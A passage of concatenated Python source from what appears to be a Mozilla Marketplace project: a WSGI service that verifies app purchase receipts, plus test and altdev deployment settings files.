from wsgiref.handlers import format_date_time
import jwt
from browserid.errors import ExpiredSignatureError
from django_statsd.clients import statsd
from receipts import certs
from lib.cef_loggers import receipt_cef
from lib.crypto.receipt import sign
from services.utils import settings
from utils import (CONTRIB_CHARGEBACK, CONTRIB_NO_CHARGE, CONTRIB_PURCHASE,
CONTRIB_REFUND, log_configure, log_exception, log_info,
mypool)
# Go configure the log.
log_configure()
# This has to be imported after the settings (utils).
import receipts  # NOQA, used for patching in the tests
# WSGI status lines for the only statuses this service ever emits.
status_codes = {
    200: '200 OK',
    405: '405 Method Not Allowed',
    500: '500 Internal Server Error',
}
class VerificationError(Exception):
    """Raised when the certificate verifier rejects a receipt's signature."""
    pass
class InvalidReceipt(Exception):
    """
    InvalidReceipt takes a message, which is then displayed back to the app
    (as the 'reason' field of the 'invalid' response) so they can understand
    the failure.
    """
    pass
class RefundedReceipt(Exception):
    """Raised when the purchase behind a receipt was refunded or charged back."""
    pass
class Verify:
    """Check a receipt's contents, database state and expiry.

    Each public check_* entry point returns a JSON-serializable dict with a
    'status' key of ok / expired / invalid / refunded.
    """
    def __init__(self, receipt, environ):
        # Raw receipt string and the WSGI environ of the verify request.
        self.receipt = receipt
        self.environ = environ
        # These will be extracted from the receipt.
        self.decoded = None
        self.addon_id = None
        self.user_id = None
        self.uuid = None
        # This is so the unit tests can override the connection.
        self.conn, self.cursor = None, None
    def setup_db(self):
        # Lazily grab a pooled connection; no-op if a cursor already exists.
        if not self.cursor:
            self.conn = mypool.connect()
            self.cursor = self.conn.cursor()
    def check_full(self):
        """
        This is the default that verify will use, this will
        do the entire stack of checks.
        """
        receipt_domain = urlparse(settings.WEBAPPS_RECEIPT_URL).netloc
        try:
            self.decoded = self.decode()
            self.check_type('purchase-receipt')
            self.check_db()
            self.check_url(receipt_domain)
        except InvalidReceipt, err:
            return self.invalid(str(err))
        # Purchase state is checked separately: it can also signal a refund.
        try:
            self.check_purchase()
        except InvalidReceipt, err:
            return self.invalid(str(err))
        except RefundedReceipt:
            return self.refund()
        return self.ok_or_expired()
    def check_without_purchase(self):
        """
        This is what the developer and reviewer receipts do, we aren't
        expecting a purchase, but require a specific type and install.
        """
        try:
            self.decoded = self.decode()
            self.check_type('developer-receipt', 'reviewer-receipt')
            self.check_db()
            self.check_url(settings.DOMAIN)
        except InvalidReceipt, err:
            return self.invalid(str(err))
        return self.ok_or_expired()
    def check_without_db(self, status):
        """
        This is what test receipts do, no purchase or install check.
        In this case the return is custom to the caller.
        """
        assert status in ['ok', 'expired', 'invalid', 'refunded']
        try:
            self.decoded = self.decode()
            self.check_type('test-receipt')
            self.check_url(settings.DOMAIN)
        except InvalidReceipt, err:
            return self.invalid(str(err))
        # Dispatch to the handler named by the caller-chosen status.
        return getattr(self, status)()
    def decode(self):
        """
        Verifies that the receipt can be decoded and that the initial
        contents of the receipt are correct.
        If its invalid, then just return invalid rather than give out any
        information.
        """
        try:
            receipt = decode_receipt(self.receipt)
        except:
            # Deliberately broad: any decode failure is reported uniformly.
            log_exception({'receipt': '%s...' % self.receipt[:10],
                           'addon': self.addon_id})
            log_info('Error decoding receipt')
            raise InvalidReceipt('ERROR_DECODING')
        try:
            assert receipt['user']['type'] == 'directed-identifier'
        except (AssertionError, KeyError):
            log_info('No directed-identifier supplied')
            raise InvalidReceipt('NO_DIRECTED_IDENTIFIER')
        return receipt
    def check_type(self, *types):
        """
        Verifies that the type of receipt is what we expect.
        """
        if self.decoded.get('typ', '') not in types:
            log_info('Receipt type not in %s' % ','.join(types))
            raise InvalidReceipt('WRONG_TYPE')
    def check_url(self, domain):
        """
        Verifies that the URL of the verification is what we expect.
        :param domain: the domain you expect the receipt to be verified at,
            note that "real" receipts are verified at a different domain
            from the main marketplace domain.
        """
        path = self.environ['PATH_INFO']
        parsed = urlparse(self.decoded.get('verify', ''))
        if parsed.netloc != domain:
            log_info('Receipt had invalid domain')
            raise InvalidReceipt('WRONG_DOMAIN')
        if parsed.path != path:
            log_info('Receipt had the wrong path')
            raise InvalidReceipt('WRONG_PATH')
    def check_db(self):
        """
        Verifies the decoded receipt against the database.
        Requires that decode is run first.
        """
        if not self.decoded:
            raise ValueError('decode not run')
        self.setup_db()
        # Get the addon and user information from the installed table.
        try:
            self.uuid = self.decoded['user']['value']
        except KeyError:
            # If somehow we got a valid receipt without a uuid
            # that's a problem. Log here.
            log_info('No user in receipt')
            raise InvalidReceipt('NO_USER')
        try:
            # storedata is a query string; the app id lives under 'id'.
            storedata = self.decoded['product']['storedata']
            self.addon_id = int(dict(parse_qsl(storedata)).get('id', ''))
        except:
            # There was some value for storedata but it was invalid.
            log_info('Invalid store data')
            raise InvalidReceipt('WRONG_STOREDATA')
    def check_purchase(self):
        """
        Verifies that the app has been purchased.
        """
        sql = """SELECT id, type FROM addon_purchase
                 WHERE addon_id = %(addon_id)s
                 AND uuid = %(uuid)s LIMIT 1;"""
        self.cursor.execute(sql, {'addon_id': self.addon_id,
                                  'uuid': self.uuid})
        result = self.cursor.fetchone()
        if not result:
            log_info('Invalid receipt, no purchase')
            raise InvalidReceipt('NO_PURCHASE')
        # result[-1] is the contribution type column.
        if result[-1] in (CONTRIB_REFUND, CONTRIB_CHARGEBACK):
            log_info('Valid receipt, but refunded')
            raise RefundedReceipt
        elif result[-1] in (CONTRIB_PURCHASE, CONTRIB_NO_CHARGE):
            log_info('Valid receipt')
            return
        else:
            log_info('Valid receipt, but invalid contribution')
            raise InvalidReceipt('WRONG_PURCHASE')
    def invalid(self, reason=''):
        receipt_cef.log(self.environ, self.addon_id, 'verify',
                        'Invalid receipt')
        return {'status': 'invalid', 'reason': reason}
    def ok_or_expired(self):
        # This receipt is ok now let's check it's expiry.
        # If it's expired, we'll have to return a new receipt
        try:
            expire = int(self.decoded.get('exp', 0))
        except ValueError:
            log_info('Error with expiry in the receipt')
            return self.expired()
        now = calendar.timegm(gmtime()) + 10  # For any clock skew.
        if now > expire:
            log_info('This receipt has expired: %s UTC < %s UTC'
                     % (datetime.utcfromtimestamp(expire),
                        datetime.utcfromtimestamp(now)))
            return self.expired()
        return self.ok()
    def ok(self):
        return {'status': 'ok'}
    def refund(self):
        receipt_cef.log(self.environ, self.addon_id, 'verify',
                        'Refunded receipt')
        return {'status': 'refunded'}
    def expired(self):
        receipt_cef.log(self.environ, self.addon_id, 'verify',
                        'Expired receipt')
        if settings.WEBAPPS_RECEIPT_EXPIRED_SEND:
            # Re-issue: bump the expiry and hand back a freshly-signed copy.
            self.decoded['exp'] = (calendar.timegm(gmtime()) +
                                   settings.WEBAPPS_RECEIPT_EXPIRY_SECONDS)
            # Log that we are signing a new receipt as well.
            receipt_cef.log(self.environ, self.addon_id, 'sign',
                            'Expired signing request')
            return {'status': 'expired',
                    'receipt': sign(self.decoded)}
        return {'status': 'expired'}
def get_headers(length):
    """Build the response header list for a body of *length* bytes."""
    # CORS is wide open on purpose: any app origin may verify a receipt,
    # and only POST is advertised.
    headers = [('Access-Control-Allow-Origin', '*'),
               ('Access-Control-Allow-Methods', 'POST'),
               ('Content-Type', 'application/json')]
    headers.append(('Content-Length', str(length)))
    headers.append(('Cache-Control', 'no-cache'))
    headers.append(('Last-Modified', format_date_time(time())))
    return headers
def decode_receipt(receipt):
    """
    Cracks the receipt using the private key. This will probably change
    to using the cert at some point, especially when we get the HSM.
    """
    with statsd.timer('services.decode'):
        if settings.SIGNING_SERVER_ACTIVE:
            # Verify the certificate chain first; the JWT payload (the part
            # after '~') is then decoded without re-verifying its signature.
            verifier = certs.ReceiptVerifier(valid_issuers=
                                             settings.SIGNING_VALID_ISSUERS)
            try:
                result = verifier.verify(receipt)
            except ExpiredSignatureError:
                # Until we can do something meaningful with this, just ignore.
                return jwt.decode(receipt.split('~')[1], verify=False)
            if not result:
                raise VerificationError()
            return jwt.decode(receipt.split('~')[1], verify=False)
        else:
            # No signing server: decode against the local RSA key instead.
            key = jwt.rsa_load(settings.WEBAPPS_RECEIPT_KEY)
            raw = jwt.decode(receipt, key)
            return raw
def status_check(environ):
    """Health check; returns (HTTP status, body) — 500 plus the error text
    when config or database access fails."""
    output = ''
    # Check we can read from the users_install table, should be nice and
    # fast. Anything that fails here, connecting to db, accessing table
    # will be an error we need to know about.
    if not settings.SIGNING_SERVER_ACTIVE:
        return 500, 'SIGNING_SERVER_ACTIVE is not set'
    try:
        conn = mypool.connect()
        cursor = conn.cursor()
        cursor.execute('SELECT id FROM users_install ORDER BY id DESC LIMIT 1')
    except Exception, err:
        return 500, str(err)
    return 200, output
def receipt_check(environ):
    """Run a full receipt verification; return (HTTP status, JSON body).

    (The old trailing ``return output`` after the try/except — and the
    ``output`` variable itself — were unreachable dead code and have been
    removed; every path already returns inside the timer block.)
    """
    with statsd.timer('services.verify'):
        data = environ['wsgi.input'].read()
        try:
            verify = Verify(data, environ)
            return 200, json.dumps(verify.check_full())
        except:
            # Deliberately broad: any failure is logged and surfaced as a
            # bare 500 rather than leaking details to the caller.
            log_exception('<none>')
            return 500, ''
def application(environ, start_response):
    """WSGI entry point: route the status check and receipt verification."""
    body = ''
    path = environ.get('PATH_INFO', '')
    if path == '/services/status/':
        status, body = status_check(environ)
    else:
        # Only allow POST through as per spec.
        if environ.get('REQUEST_METHOD') != 'POST':
            status = 405
        else:
            status, body = receipt_check(environ)
    start_response(status_codes[status], get_headers(len(body)))
    return [body]
########NEW FILE########
__FILENAME__ = receiptverify
import os
import site
# Tell Django which settings to use before anything imports it.
os.environ['DJANGO_SETTINGS_MODULE'] = 'settings_local_mkt'
wsgidir = os.path.dirname(__file__)
# Put the project root, vendor libs and apps on sys.path (relative to this
# wsgi file) so `verify` and its dependencies import cleanly under mod_wsgi.
for path in ['../',
             '../..',
             '../../..',
             '../../vendor/lib/python',
             '../../apps']:
    site.addsitedir(os.path.abspath(os.path.join(wsgidir, path)))
from verify import application
########NEW FILE########
__FILENAME__ = settings_test
import atexit
import os
import tempfile
from lib.settings_base import ROOT
from django.utils.functional import lazy
# Temp dirs created for this test run; removed again at interpreter exit.
_tmpdirs = set()
def _cleanup():
    """Best-effort removal of every registered temp dir at exit."""
    # Imports can fail during interpreter shutdown; bail out quietly.
    try:
        import sys
        import shutil
    except ImportError:
        return
    tmp = None
    try:
        for tmp in _tmpdirs:
            shutil.rmtree(tmp)
    except Exception, exc:
        sys.stderr.write("\n** shutil.rmtree(%r): %s\n" % (tmp, exc))
atexit.register(_cleanup)
def _polite_tmpdir():
    """Make a temp dir and register it for removal at exit."""
    tmp = tempfile.mkdtemp()
    _tmpdirs.add(tmp)
    return tmp
# See settings.py for documentation:
IN_TEST_SUITE = True
# Every on-disk path points at a throwaway temp dir for the test run.
NETAPP_STORAGE = _polite_tmpdir()
ADDONS_PATH = _polite_tmpdir()
GUARDED_ADDONS_PATH = _polite_tmpdir()
SIGNED_APPS_PATH = _polite_tmpdir()
SIGNED_APPS_REVIEWER_PATH = _polite_tmpdir()
UPLOADS_PATH = _polite_tmpdir()
MIRROR_STAGE_PATH = _polite_tmpdir()
TMP_PATH = _polite_tmpdir()
COLLECTIONS_ICON_PATH = _polite_tmpdir()
REVIEWER_ATTACHMENTS_PATH = _polite_tmpdir()
DUMPED_APPS_PATH = _polite_tmpdir()
AUTHENTICATION_BACKENDS = (
    'django_browserid.auth.BrowserIDBackend',
)
# We won't actually send an email.
# NOTE(review): the value is True despite the comment above — presumably a
# test mail backend intercepts delivery; confirm before relying on it.
SEND_REAL_EMAIL = True
# Turn off search engine indexing.
USE_ELASTIC = False
# Ensure all validation code runs in tests:
VALIDATE_ADDONS = True
PAYPAL_PERMISSIONS_URL = ''
ENABLE_API_ERROR_SERVICE = False
SITE_URL = 'http://testserver'
STATIC_URL = SITE_URL + '/'
MOBILE_SITE_URL = ''
MEDIA_URL = '/media/'
# Reset these URLs to the defaults so your settings_local doesn't clobber them:
ADDON_ICONS_DEFAULT_URL = MEDIA_URL + '/img/addon-icons'
ADDON_ICON_BASE_URL = MEDIA_URL + 'img/icons/'
ADDON_ICON_URL = (STATIC_URL +
                  'img/uploads/addon_icons/%s/%s-%s.png?modified=%s')
PREVIEW_THUMBNAIL_URL = (STATIC_URL +
                         'img/uploads/previews/thumbs/%s/%d.png?modified=%d')
PREVIEW_FULL_URL = (STATIC_URL +
                    'img/uploads/previews/full/%s/%d.%s?modified=%d')
USERPICS_URL = STATIC_URL + 'img/uploads/userpics/%s/%s/%s.png?modified=%d'
# In-process cache only: no memcached dependency in the test suite.
CACHES = {
    'default': {
        'BACKEND': 'caching.backends.locmem.LocMemCache',
    }
}
# COUNT() caching can't be invalidated, it just expires after x seconds. This
# is just too annoying for tests, so disable it.
CACHE_COUNT_TIMEOUT = -1
# No more failures!
APP_PREVIEW = False
# Overrides whatever storage you might have put in local settings.
DEFAULT_FILE_STORAGE = 'amo.utils.LocalFileStorage'
# Dummy video library so tests don't need ffmpeg installed.
VIDEO_LIBRARIES = ['lib.video.dummy']
ALLOW_SELF_REVIEWS = True
# Make sure debug toolbar output is disabled so it doesn't interfere with any
# html tests.
DEBUG_TOOLBAR_CONFIG = {
    'INTERCEPT_REDIRECTS': False,
    'SHOW_TOOLBAR_CALLBACK': lambda r: False,
    'HIDE_DJANGO_SQL': True,
    'TAG': 'div',
    'ENABLE_STACKTRACES': False,
}
MOZMARKET_VENDOR_EXCLUDE = []
def lazy_langs(languages):
    """Map lowercased locale codes to their native-language names."""
    from product_details import product_details
    # product_details may not be populated yet; fall back to nothing.
    if not product_details.languages:
        return {}
    return dict((code.lower(), product_details.languages[code]['native'])
                for code in languages)
AMO_LANGUAGES = (
    'af', 'ar', 'bg', 'ca', 'cs', 'da', 'de', 'el', 'en-US', 'es', 'eu', 'fa',
    'fi', 'fr', 'ga-IE', 'he', 'hu', 'id', 'it', 'ja', 'ko', 'mn', 'nl', 'pl',
    'pt-BR', 'pt-PT', 'ro', 'ru', 'sk', 'sl', 'sq', 'sv-SE', 'uk', 'vi',
    'zh-CN', 'zh-TW',
)
# LANGUAGES is resolved lazily so product_details isn't hit at import time.
LANGUAGES = lazy(lazy_langs, dict)(AMO_LANGUAGES)
LANGUAGE_URL_MAP = dict([(i.lower(), i) for i in AMO_LANGUAGES])
TASK_USER_ID = '4043307'
# MD5 keeps test-user creation fast; never use this hasher outside tests.
PASSWORD_HASHERS = (
    'django.contrib.auth.hashers.MD5PasswordHasher',
)
SQL_RESET_SEQUENCES = False
GEOIP_URL = ''
GEOIP_DEFAULT_VAL = 'restofworld'
GEOIP_DEFAULT_TIMEOUT = .2
ES_DEFAULT_NUM_REPLICAS = 0
ES_DEFAULT_NUM_SHARDS = 3
IARC_MOCK = True
# Ensure that exceptions aren't re-raised.
DEBUG_PROPAGATE_EXCEPTIONS = False
PAYMENT_PROVIDERS = ['bango']
# When not testing this specific feature, make sure it's off.
PRE_GENERATE_APKS = False
# This is a precaution in case something isn't mocked right.
PRE_GENERATE_APK_URL = 'http://you-should-never-load-this.com/'
# A sample key for signing receipts.
WEBAPPS_RECEIPT_KEY = os.path.join(ROOT, 'mkt/webapps/tests/sample.key')
########NEW FILE########
__FILENAME__ = settings_base
"""private_base will be populated from puppet and placed in this directory"""
import logging
import os
import dj_database_url
from lib.settings_base import (CACHE_PREFIX, ES_INDEXES,
KNOWN_PROXIES, LOGGING, HOSTNAME)
from .. import splitstrip
import private_base as private
# Dev/altdev host: keep crawlers out, debugging off, cookies secure.
ENGAGE_ROBOTS = False
EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
EMAIL_HOST = private.EMAIL_HOST
DEBUG = False
TEMPLATE_DEBUG = DEBUG
DEBUG_PROPAGATE_EXCEPTIONS = False
SESSION_COOKIE_SECURE = True
REDIRECT_SECRET_KEY = private.REDIRECT_SECRET_KEY
ADMINS = ()
# Master + read slave, both through the pooled MySQL engine; DB URLs come
# from the puppet-provisioned private settings.
DATABASES = {}
DATABASES['default'] = dj_database_url.parse(private.DATABASES_DEFAULT_URL)
DATABASES['default']['ENGINE'] = 'mysql_pool'
DATABASES['default']['OPTIONS'] = {'init_command': 'SET storage_engine=InnoDB'}
DATABASES['slave'] = dj_database_url.parse(private.DATABASES_SLAVE_URL)
DATABASES['slave']['ENGINE'] = 'mysql_pool'
DATABASES['slave']['OPTIONS'] = {'init_command': 'SET storage_engine=InnoDB'}
DATABASES['slave']['sa_pool_key'] = 'slave'
DATABASE_POOL_ARGS = {
    'max_overflow': 10,
    'pool_size': 5,
    'recycle': 30
}
SERVICES_DATABASE = dj_database_url.parse(private.SERVICES_DATABASE_URL)
SLAVE_DATABASES = ['slave']
CACHES = {
    'default': {
        'BACKEND': 'djpymemcache.backend.PyMemcacheCache',
        'LOCATION': splitstrip(private.CACHES_DEFAULT_LOCATION),
        'TIMEOUT': 500,
        'KEY_PREFIX': CACHE_PREFIX,
    }
}
SECRET_KEY = private.SECRET_KEY
LOG_LEVEL = logging.DEBUG
## Celery
BROKER_URL = private.BROKER_URL
CELERY_IGNORE_RESULT = True
CELERY_DISABLE_RATE_LIMITS = True
CELERYD_PREFETCH_MULTIPLIER = 1
# Shared-storage paths all hang off the NetApp mount.
NETAPP_STORAGE = private.NETAPP_STORAGE_ROOT + '/shared_storage'
MIRROR_STAGE_PATH = private.NETAPP_STORAGE_ROOT + '/public-staging'
GUARDED_ADDONS_PATH = private.NETAPP_STORAGE_ROOT + '/guarded-addons'
UPLOADS_PATH = NETAPP_STORAGE + '/uploads'
USERPICS_PATH = UPLOADS_PATH + '/userpics'
ADDON_ICONS_PATH = UPLOADS_PATH + '/addon_icons'
COLLECTIONS_ICON_PATH = UPLOADS_PATH + '/collection_icons'
IMAGEASSETS_PATH = UPLOADS_PATH + '/imageassets'
REVIEWER_ATTACHMENTS_PATH = UPLOADS_PATH + '/reviewer_attachment'
PREVIEWS_PATH = UPLOADS_PATH + '/previews'
SIGNED_APPS_PATH = NETAPP_STORAGE + '/signed_apps'
SIGNED_APPS_REVIEWER_PATH = NETAPP_STORAGE + '/signed_apps_reviewer'
PREVIEW_THUMBNAIL_PATH = PREVIEWS_PATH + '/thumbs/%s/%d.png'
PREVIEW_FULL_PATH = PREVIEWS_PATH + '/full/%s/%d.%s'
HERA = []
# Quieten noisy third-party loggers; keep our own apps verbose on dev.
LOGGING['loggers'].update({
    'amqp': {'level': logging.WARNING},
    'raven': {'level': logging.WARNING},
    'requests': {'level': logging.WARNING},
    'z.addons': {'level': logging.DEBUG},
    'z.task': {'level': logging.DEBUG},
    'z.hera': {'level': logging.INFO},
    'z.redis': {'level': logging.DEBUG},
    'z.pool': {'level': logging.ERROR},
})
# Redis endpoints, all provisioned via the private settings.
REDIS_BACKEND = private.REDIS_BACKENDS_CACHE
REDIS_BACKENDS = {
    'cache': private.REDIS_BACKENDS_CACHE,
    'cache_slave': private.REDIS_BACKENDS_CACHE_SLAVE,
    'master': private.REDIS_BACKENDS_MASTER,
    'slave': private.REDIS_BACKENDS_SLAVE,
}
CACHE_MACHINE_USE_REDIS = True
RECAPTCHA_PUBLIC_KEY = private.RECAPTCHA_PUBLIC_KEY
RECAPTCHA_PRIVATE_KEY = private.RECAPTCHA_PRIVATE_KEY
RECAPTCHA_URL = ('https://www.google.com/recaptcha/api/challenge?k=%s' %
                 RECAPTCHA_PUBLIC_KEY)
TMP_PATH = os.path.join(NETAPP_STORAGE, 'tmp')
ADDONS_PATH = private.NETAPP_STORAGE_ROOT + '/files'
SPIDERMONKEY = '/usr/bin/tracemonkey'
# Remove DetectMobileMiddleware from middleware in production.
detect = 'mobility.middleware.DetectMobileMiddleware'
csp = 'csp.middleware.CSPMiddleware'
RESPONSYS_ID = private.RESPONSYS_ID
CRONJOB_LOCK_PREFIX = 'mkt-altdev'
BUILDER_SECRET_KEY = private.BUILDER_SECRET_KEY
BUILDER_VERSIONS_URL = "https://builder-addons-dev.allizom.org/repackage/sdk-versions/"
# Elasticsearch: suffix every index name so altdev never shares indexes.
ES_HOSTS = splitstrip(private.ES_HOSTS)
ES_URLS = ['http://%s' % h for h in ES_HOSTS]
ES_INDEXES = dict((k, '%s_altdev' % v) for k, v in ES_INDEXES.items())
BUILDER_UPGRADE_URL = "https://builder-addons-dev.allizom.org/repackage/rebuild/"
STATSD_HOST = private.STATSD_HOST
STATSD_PORT = private.STATSD_PORT
STATSD_PREFIX = private.STATSD_PREFIX
GRAPHITE_HOST = private.GRAPHITE_HOST
GRAPHITE_PORT = private.GRAPHITE_PORT
GRAPHITE_PREFIX = private.GRAPHITE_PREFIX
CEF_PRODUCT = STATSD_PREFIX
ES_TIMEOUT = 60
EXPOSE_VALIDATOR_TRACEBACKS = True
# Load balancers / proxies whose X-Forwarded-For we trust.
KNOWN_PROXIES += ['10.2.83.105',
                  '10.2.83.106',
                  '10.2.83.107',
                  '10.8.83.200',
                  '10.8.83.201',
                  '10.8.83.202',
                  '10.8.83.203',
                  '10.8.83.204',
                  '10.8.83.210',
                  '10.8.83.211',
                  '10.8.83.212',
                  '10.8.83.213',
                  '10.8.83.214',
                  '10.8.83.215',
                  '10.8.83.251',
                  '10.8.83.252',
                  '10.8.83.253',
                  ]
NEW_FEATURES = True
REDIRECT_URL = 'https://outgoing-mkt-dev.allizom.org/v1/'
CLEANCSS_BIN = 'cleancss'
UGLIFY_BIN = 'uglifyjs'
CELERYD_TASK_SOFT_TIME_LIMIT = 240
LESS_PREPROCESS = True
XSENDFILE_HEADER = 'X-Accel-Redirect'
ALLOW_SELF_REVIEWS = True
GOOGLE_ANALYTICS_CREDENTIALS = private.GOOGLE_ANALYTICS_CREDENTIALS
GOOGLE_API_CREDENTIALS = private.GOOGLE_API_CREDENTIALS
MONOLITH_SERVER = 'https://monolith-dev.allizom.org'
GEOIP_URL = 'https://geo-dev-marketplace.allizom.org'
AWS_ACCESS_KEY_ID = private.AWS_ACCESS_KEY_ID
AWS_SECRET_ACCESS_KEY = private.AWS_SECRET_ACCESS_KEY
AWS_STORAGE_BUCKET_NAME = private.AWS_STORAGE_BUCKET_NAME
RAISE_ON_SIGNAL_ERROR = True
API_THROTTLE = False
# New Relic is only enabled when this host is in the whitelist.
NEWRELIC_WHITELIST = ['dev1.addons.phx1.mozilla.com',
                      'dev2.addons.phx1.mozilla.com']
NEWRELIC_ENABLE = HOSTNAME in NEWRELIC_WHITELIST
AES_KEYS = private.AES_KEYS
########NEW FILE########
__FILENAME__ = settings_mkt
"""private_mkt will be populated from puppet and placed in this directory"""
from lib.settings_base import *
from mkt.settings import *
from settings_base import *
import private_mkt
DOMAIN = "marketplace-altdev.allizom.org"
SERVER_EMAIL = '[email protected]'
SITE_URL = 'https://marketplace-altdev.allizom.org'
SERVICES_URL = SITE_URL
# CUSTOM_CDN lets a local/dev run override where static assets come from.
STATIC_URL = os.getenv('CUSTOM_CDN', 'https://marketplace-altdev-cdn.allizom.org/')
LOCAL_MIRROR_URL = '%s_files' % STATIC_URL
MIRROR_URL = LOCAL_MIRROR_URL
# CSP wants the origin without the trailing slash.
CSP_STATIC_URL = STATIC_URL[:-1]
CSP_IMG_SRC = CSP_IMG_SRC + (CSP_STATIC_URL,)
CSP_SCRIPT_SRC = CSP_SCRIPT_SRC + (CSP_STATIC_URL,)
CSP_STYLE_SRC = CSP_STYLE_SRC + (CSP_STATIC_URL,)
CSP_FONT_SRC = CSP_FONT_SRC + (CSP_STATIC_URL,)
# NOTE(review): this first ADDON_ICON_URL is immediately overwritten by the
# assignment below — the %-formatted value here is dead.
ADDON_ICON_URL = "%s/%s/%s/images/addon_icon/%%d-%%d.png?modified=%%s" % (
    STATIC_URL, LANGUAGE_CODE, DEFAULT_APP)
ADDON_ICON_URL = STATIC_URL + 'img/uploads/addon_icons/%s/%s-%s.png?modified=%s'
PREVIEW_THUMBNAIL_URL = (STATIC_URL +
                         'img/uploads/previews/thumbs/%s/%d.png?modified=%d')
PREVIEW_FULL_URL = (STATIC_URL +
                    'img/uploads/previews/full/%s/%d.%s?modified=%d')
# paths for uploaded extensions
FILES_URL = STATIC_URL + "%s/%s/downloads/file/%d/%s?src=%s"
SESSION_COOKIE_DOMAIN = ".%s" % DOMAIN
# paths for user profile pictures
USERPICS_URL = STATIC_URL + 'img/uploads/userpics/%s/%s/%s.png?modified=%d'
COLLECTION_ICON_URL = STATIC_URL + '/img/uploads/collection_icons/%s/%s.png?m=%s'
MEDIA_URL = STATIC_URL + 'media/'
ADDON_ICONS_DEFAULT_URL = MEDIA_URL + 'img/hub'
ADDON_ICON_BASE_URL = MEDIA_URL + 'img/icons/'
PRODUCT_ICON_URL = STATIC_URL + 'product-icons'
CACHE_PREFIX = 'altdev.mkt.%s' % CACHE_PREFIX
CACHE_MIDDLEWARE_KEY_PREFIX = CACHE_PREFIX
CACHES['default']['KEY_PREFIX'] = CACHE_PREFIX
SYSLOG_TAG = "http_app_addons_marketplacedev"
SYSLOG_TAG2 = "http_app_addons_marketplacedev_timer"
SYSLOG_CSP = "http_app_addons_marketplacedev_csp"
# NOTE(review): '-dev' prefix in the '-altdev' settings file — confirm
# whether altdev metrics are intentionally merged into the dev bucket.
STATSD_PREFIX = 'marketplace-dev'
# Redis: marketplace-specific endpoints, falling back to the shared ones.
REDIS_BACKEND = getattr(private_mkt, 'REDIS_BACKENDS_CACHE', private.REDIS_BACKENDS_CACHE)
REDIS_BACKENDS_CACHE_SLAVE = getattr(private_mkt, 'REDIS_BACKENDS_CACHE_SLAVE', private.REDIS_BACKENDS_CACHE_SLAVE)
REDIS_BACKENDS_MASTER = getattr(private_mkt, 'REDIS_BACKENDS_MASTER', private.REDIS_BACKENDS_MASTER)
REDIS_BACKENDS_SLAVE = getattr(private_mkt, 'REDIS_BACKENDS_SLAVE', private.REDIS_BACKENDS_SLAVE)
REDIS_BACKENDS = {
    'cache': REDIS_BACKEND,
    'cache_slave': REDIS_BACKENDS_CACHE_SLAVE,
    'master': REDIS_BACKENDS_MASTER,
    'slave': REDIS_BACKENDS_SLAVE,
}
## Celery
BROKER_URL = private_mkt.BROKER_URL
CELERY_IGNORE_RESULT = True
CELERY_DISABLE_RATE_LIMITS = True
CELERYD_PREFETCH_MULTIPLIER = 1
WEBAPPS_RECEIPT_KEY = private_mkt.WEBAPPS_RECEIPT_KEY
WEBAPPS_RECEIPT_URL = private_mkt.WEBAPPS_RECEIPT_URL
APP_PREVIEW = True
WEBAPPS_UNIQUE_BY_DOMAIN = False
SENTRY_DSN = private_mkt.SENTRY_DSN
WEBAPPS_PUBLIC_KEY_DIRECTORY = NETAPP_STORAGE + '/public_keys'
PRODUCT_ICON_PATH = NETAPP_STORAGE + '/product-icons'
DUMPED_APPS_PATH = NETAPP_STORAGE + '/dumped-apps'
DUMPED_USERS_PATH = NETAPP_STORAGE + '/dumped-users'
SOLITUDE_HOSTS = ('https://payments-dev.allizom.org',)
SOLITUDE_OAUTH = {'key': private_mkt.SOLITUDE_OAUTH_KEY,
                  'secret': private_mkt.SOLITUDE_OAUTH_SECRET}
VALIDATOR_IAF_URLS = ['https://marketplace.firefox.com',
                      'https://marketplace.allizom.org',
                      'https://marketplace-dev.allizom.org',
                      'https://marketplace-altdev.allizom.org']
# Override the limited marketplace ones with these ones from AMO. Because
# the base gets overridden in the mkt.settings file, we'll set them back again.
# Note the addition of dbg here.
AMO_LANGUAGES = (
    'af', 'ar', 'bg', 'ca', 'cs', 'da', 'de', 'el', 'en-US', 'es', 'eu', 'fa',
    'fi', 'fr', 'ga-IE', 'he', 'hu', 'id', 'it', 'ja', 'ko', 'mn', 'nl', 'pl',
    'pt-BR', 'pt-PT', 'ro', 'ru', 'sk', 'sl', 'sq', 'sr', 'sr-Latn', 'sv-SE',
    'tr', 'uk', 'vi', 'zh-CN', 'zh-TW', 'dbg'
)
LANGUAGES = lazy(lazy_langs, dict)(AMO_LANGUAGES)
LANGUAGE_URL_MAP = dict([(i.lower(), i) for i in AMO_LANGUAGES])
HIDDEN_LANGUAGES = (
    'cy',
)
BLUEVIA_SECRET = private_mkt.BLUEVIA_SECRET
#Bug 748403
SIGNING_SERVER = private_mkt.SIGNING_SERVER
SIGNING_SERVER_ACTIVE = True
# NOTE(review): '-dev' issuer in the '-altdev' settings file — confirm this
# is the intended CDN issuer for altdev receipts.
SIGNING_VALID_ISSUERS = ['marketplace-dev-cdn.allizom.org']
#Bug 793876
SIGNED_APPS_KEY = private_mkt.SIGNED_APPS_KEY
SIGNED_APPS_SERVER_ACTIVE = True
SIGNED_APPS_SERVER = private_mkt.SIGNED_APPS_SERVER
SIGNED_APPS_REVIEWER_SERVER_ACTIVE = True
SIGNED_APPS_REVIEWER_SERVER = private_mkt.SIGNED_APPS_REVIEWER_SERVER
# Heka client: CEF events go out over UDP to the configured collector.
HEKA_CONF = {
    'plugins': {'cef': ('heka_cef.cef_plugin:config_plugin', {
        'syslog_facility': 'LOCAL4',
        # CEF_PRODUCT is defined in settings_base
        'syslog_ident': CEF_PRODUCT,
        'syslog_priority': 'INFO'
    }),
    },
    'stream': {
        'class': 'heka.streams.UdpStream',
        'host': splitstrip(private.HEKA_CONF_SENDER_HOST),
        'port': private.HEKA_CONF_SENDER_PORT,
    },
    'logger': 'addons-marketplace-altdev',
}
HEKA = client_from_dict_config(HEKA_CONF)
USE_HEKA_FOR_CEF = True
GOOGLE_ANALYTICS_DOMAIN = 'marketplace.firefox.com'
# Pass through the DSN to the Raven client and force signal
# registration so that exceptions are passed through to sentry
#RAVEN_CONFIG = {'dsn': SENTRY_DSN, 'register_signals': True}
# See mkt/settings.py for more info.
APP_PURCHASE_KEY = DOMAIN
APP_PURCHASE_AUD = DOMAIN
APP_PURCHASE_TYP = 'mozilla-dev/payments/pay/v1'
APP_PURCHASE_SECRET = private_mkt.APP_PURCHASE_SECRET
# We upgraded to jQuery 1.9.1. Run this command to include jquery-migrate in the JS
